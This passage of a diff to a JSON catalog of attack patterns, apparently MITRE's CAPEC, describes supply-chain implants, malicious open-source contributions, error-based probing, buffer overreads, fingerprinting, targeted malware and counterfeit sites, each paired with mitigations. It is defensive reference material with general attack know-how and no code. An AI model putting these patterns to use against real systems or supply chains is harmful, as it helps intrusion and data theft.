"Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "\n The adversary, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for hardware and/or firmware design, 
sends a phishing email with a malicious attachment to the manufacturer. When viewed, the malicious attachment installs a backdoor that allows the adversary to remotely compromise the adjacent hardware development system from the manufacturer's workstation. The adversary is then able to exfiltrate and alter sensitive data on the hardware system, allowing for future compromise once the developed system is deployed at the victim location.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).", + "The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.", + "The adversary must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure." + ], + "x_capec_skills_required": { + "High": "Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)", + "Medium": "Intelligence about the manufacturer's operating environment and infrastructure." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Verify software downloads and updates to ensure they have not been modified be adversaries", + "id": "course-of-action--aba55887-195f-49b2-b2cf-5d26b34dd710", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7ffabfce-822a-4165-a38e-cb6682cc1b01", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aba55887-195f-49b2-b2cf-5d26b34dd710", + "spec_version": "2.1", + "target_ref": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage antivirus tools to detect known malware", + "id": "course-of-action--ba680e4a-b82b-479e-9903-4a8807c52c60", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6363da74-7aae-401b-8cc9-8f0dc0419658", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba680e4a-b82b-479e-9903-4a8807c52c60", + "spec_version": "2.1", + "target_ref": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not download software from untrusted sources", + "id": "course-of-action--557960a1-b40a-4a60-8750-d1649c2bbea2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7c96fb42-fe4c-4ecc-a424-bf85159f9b92", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--557960a1-b40a-4a60-8750-d1649c2bbea2", + "spec_version": "2.1", + "target_ref": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Educate designers, developers, engineers, etc. 
on social engineering attacks to avoid downloading malicious software via attacks such as phishing attacks", + "id": "course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc17b843-2585-4684-b2b8-386159db9f64", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries implant malicious code in open source software (OSS) libraries to have it widely distributed, as OSS is commonly downloaded by developers and other users to incorporate into software development projects. 
The adversary can have a particular system in mind to target, or the implantation can be the first stage of follow-on attacks on many systems.", + "external_references": [ + { + "external_id": "CAPEC-538", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/538.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Supply Chain Compromise: Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--ca626464-877a-4f42-83b7-7451cfe71a38", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Open-Source Library Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary with access to an open source code project introduces a hard-to-find bug in the software that allows under very specific conditions for encryption to be disabled on data streams. The adversary commits the change to the code which is picked up by a manufacturer who develops VPN software. 
It is eventually deployed at the victim's location where the very specific conditions are met giving the adversary the ability to sniff plaintext traffic thought to be encrypted. This can provide to the adversary access to sensitive data of the victim." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine the relevant open-source code project to target: The adversary will make the selection based on various criteria:

Experiment

  1. Develop a plan for malicious contribution: The adversary develops a plan to contribute malicious code, taking the following into consideration:

Exploit

  1. Execute the plan for malicious contribution: Write the code to be contributed based on the plan and then submit the contribution. Multiple commits, possibly using multiple identities, will help obscure the attack. Monitor the contribution site to try to determine if the code has been uploaded to the target system.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Access to the open source code base being used by the manufacturer in a system being developed or currently deployed at a victim location." + ], + "x_capec_skills_required": { + "High": "Advanced knowledge about the inclusion and specific usage of an open source code project within system being targeted for infiltration." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to the development environment process of an application-specific integrated circuit (ASIC) for a victim system being developed or maintained after initial deployment can insert malicious functionality into the system for the purpose of disruption or further compromise.", + "external_references": [ + { + "external_id": "CAPEC-539", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/539.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. 
Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--bfb711d6-f12d-496e-88b9-2c0184485976", + "modified": "2022-09-29T00:00:00.000Z", + "name": "ASIC With Malicious Functionality", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "A hardware manufacturer periodically updates its ASIC with new features. The attacker, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for ASIC design, sends a phishing email with a malicious attachment to the manufacturer. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent ASIC development system. The attacker is then able to exfiltrate and alter sensitive data on the ASIC system, allowing for future compromise once a new AISC is deployed at the victim location." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The attacker must have working knowledge of some if not all of the components involved in the target system as well as the infrastructure and development environment of the manufacturer.", + "Advanced knowledge about the ASIC installed within the target system." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious subroutines for an ASIC environment without degradation of existing functions and processes." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, aware of an application's location (and possibly authorized to use the application), probes an application's structure and evaluates its robustness by submitting requests and examining responses. Often, this is accomplished by sending variants of expected queries in the hope that these modified queries might return information beyond what the expected set of queries would provide.", + "external_references": [ + { + "external_id": "CAPEC-54", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/54.html" + }, + { + "external_id": "CWE-209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html" + } + ], + "id": "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Query System for Information", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Blind SQL injection is an example of this technique, applied to successful exploit. See also: CVE-2006-4705", + "\n Attacker sends bad data at various servlets in a J2EE system, records returned exception stack traces, and maps application functionality.\n In addition, this technique allows attackers to correlate those servlets used with the underlying open source packages (and potentially version numbers) that provide them.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine parameters: Determine all user-controllable parameters of the application either by probing or by finding documentation

Experiment

  1. Cause error condition: Inject each parameter with content that causes an error condition to manifest

  2. Modify parameters: Modify the content of each parameter according to observed error conditions

Exploit

  1. Follow up attack: Once the above steps have been repeated with enough parameters, the application will be sufficiently mapped out. The adversary can then launch a desired attack (for example, Blind SQL Injection)

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "attack-pattern--ce75149a-6882-4b07-8841-db9d6a9ec20d", + "attack-pattern--5871f734-1898-4509-860c-f418cdf6b2ac", + "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12" + ], + "x_capec_prerequisites": [ + "This class of attacks does not strictly require authorized access to the application. As Attackers use this attack process to classify, map, and identify vulnerable aspects of an application, it simply requires hypotheses to be verified, interaction with the application, and time to conduct trial-and-error activities." + ], + "x_capec_resources_required": [ + "\n The Attacker needs the ability to probe application functionality and provide it erroneous directives or data without triggering intrusion detection schemes or making enough of an impact on application logging that steps are taken against the adversary.\n The Attack does not need special hardware, software, skills, or access.\n " + ], + "x_capec_skills_required": { + "Medium": "Although fuzzing parameters is not difficult, and often possible with automated fuzzers, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Application designers can construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are cataloged and replaced with a unique (often integer-based) value 'coding' for the error. 
Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.", + "id": "course-of-action--031e02fe-84e7-4908-b507-e836876da1ab", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-54-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04308827-581a-464a-8378-efed9a9a7476", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--031e02fe-84e7-4908-b507-e836876da1ab", + "spec_version": "2.1", + "target_ref": "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Application designers can wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. 
Such a technique is often used in conjunction with the above 'code book' suggestion.", + "id": "course-of-action--c001766e-e441-4291-8f06-f59957360fde", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-54-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--60cbe06e-8a08-42af-a4ab-f81130b139ce", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c001766e-e441-4291-8f06-f59957360fde", + "spec_version": "2.1", + "target_ref": "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attacks a target by providing input that causes an application to read beyond the boundary of a defined buffer. This typically occurs when a value influencing where to start or stop reading is set to reflect positions outside of the valid memory location of the buffer. 
This type of attack may result in exposure of sensitive information, a system crash, or arbitrary code execution.", + "external_references": [ + { + "external_id": "CAPEC-540", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/540.html" + }, + { + "external_id": "CWE-125", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/125.html" + } + ], + "id": "attack-pattern--40eddae8-4d7d-4fc3-b220-1c9706f01a96", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Overread Buffers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--476ca631-2695-43f8-82f6-83c06a07ae36" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (Depending on the use of the target buffer, an application or system crash can be achieved.)" + ], + "Confidentiality": [ + "Read Data (By reading outside the boundary of the intended buffer, the adversary is potentially able to see any data that is stored on the disk. This could include secret keys, personal information, and sensitive files.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overread on. Adversaries often look for applications that accept user input and that perform manual memory management.

Experiment

  1. Find attack vector: The adversary identifies an attack vector by looking for areas in the application where they can specify to read more data than is required.

Exploit

  1. Overread the buffer: The adversary provides input to the application that gets it to read past the bounds of a buffer, possibly revealing sensitive information that was not intended to be given to the adversary.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "For this type of attack to be successful, a few prerequisites must be met. First, the targeted software must be written in a language that enables fine grained buffer control. (e.g., c, c++) Second, the targeted software must actually perform buffer operations and inadequately perform bounds-checking on those buffer operations. Finally, the adversary must have the capability to influence the input that guides these buffer operations." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in fingerprinting activities to determine the type or version of an application installed on a remote target.", + "external_references": [ + { + "external_id": "CAPEC-541", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/541.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "external_id": "CWE-205", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/205.html" + }, + { + "external_id": "CWE-208", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html" + }, + { + "description": "Gather Victim Host Information: Software", + "external_id": "T1592.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1592/002" + } + ], + "id": "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Application Fingerprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + 
"attack-pattern--76e6fe1e-34f2-40cd-8f12-f4d4f9c41808" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157", + "attack-pattern--8b7dfd02-8d21-4eed-a2a3-d9f73ed49a48", + "attack-pattern--29e8786c-a791-44c6-b1de-950cf0604643" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary develops targeted malware that takes advantage of a known vulnerability in an organizational information technology environment. The malware crafted for these attacks is based specifically on information gathered about the technology environment. Successfully executing the malware enables an adversary to achieve a wide variety of negative technical impacts.", + "external_references": [ + { + "external_id": "CAPEC-542", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/542.html" + }, + { + "description": "Develop Capabilities: Malware", + "external_id": "T1587.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1587/001" + }, + { + "description": "Obfuscated Files or Information", + "external_id": "T1027", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027" + } + ], + "id": "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Targeted Malware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862" + ], + "x_capec_child_of_refs": [ + 
"attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--aef8e9e0-4714-4890-9470-06276c61abfd", + "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc", + "attack-pattern--79037ec7-444c-42cb-a64b-fb4b4f6bd156", + "attack-pattern--ccb9c607-8bfe-4141-8843-356453179da7", + "attack-pattern--d9069913-2a5f-4ad5-878e-73181f0b1067", + "attack-pattern--b63b2869-11e6-4849-8ddf-ae2557bf554b", + "attack-pattern--9927fda8-927b-4327-b3f8-bcbd0467c702", + "attack-pattern--260a8cb6-a7df-4dc5-a057-8a00aa69de7e" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversary creates duplicates of legitimate websites. When users visit a counterfeit site, the site can gather information or upload malware.", + "external_references": [ + { + "external_id": "CAPEC-543", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/543.html" + }, + { + "description": "Masquerading: Match Legitimate Name or Location", + "external_id": "T1036.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/005" + } + ], + "id": "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Counterfeit Websites", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + 
"attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285" + ], + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a false front organizations with the appearance of a legitimate supplier in the critical life cycle path that then injects corrupted/malicious information system components into the organizational supply chain.", + "external_references": [ + { + "external_id": "CAPEC-544", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/544.html" + } + ], + "id": "attack-pattern--996aa0f7-950e-4435-a60d-ae859e545101", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Counterfeit Organizations", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary who is authorized or has the ability to search known system resources, does so with the intention of gathering useful information. System resources include files, memory, and other aspects of the target system. In this pattern of attack, the adversary does not necessarily know what they are going to find when they start pulling data. 
This is different than CAPEC-150 where the adversary knows what they are looking for due to the common location.", + "external_references": [ + { + "external_id": "CAPEC-545", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/545.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1243", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1243.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "external_id": "CWE-1278", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1278.html" + }, + { + "external_id": "CWE-1323", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1323.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1330.html" + }, + { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + }, + { + "description": "Credentials from Password Stores:Keychain", + "external_id": "T1555.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1555/001" + } + ], + "id": "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Pull Data from System Resources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": 
"attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95" + ], + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "attack-pattern--9a7492fa-b46e-48bc-aae9-beb1d359171e" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. If a cloud provider fails to completely delete storage and data from former cloud tenants' systems/resources, once these resources are allocated to new, potentially malicious tenants, the latter can probe the provided resources for sensitive information still there.", + "external_references": [ + { + "external_id": "CAPEC-546", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/546.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "description": "Kopo M. Ramokapane, Awais Rashid, Jose M. 
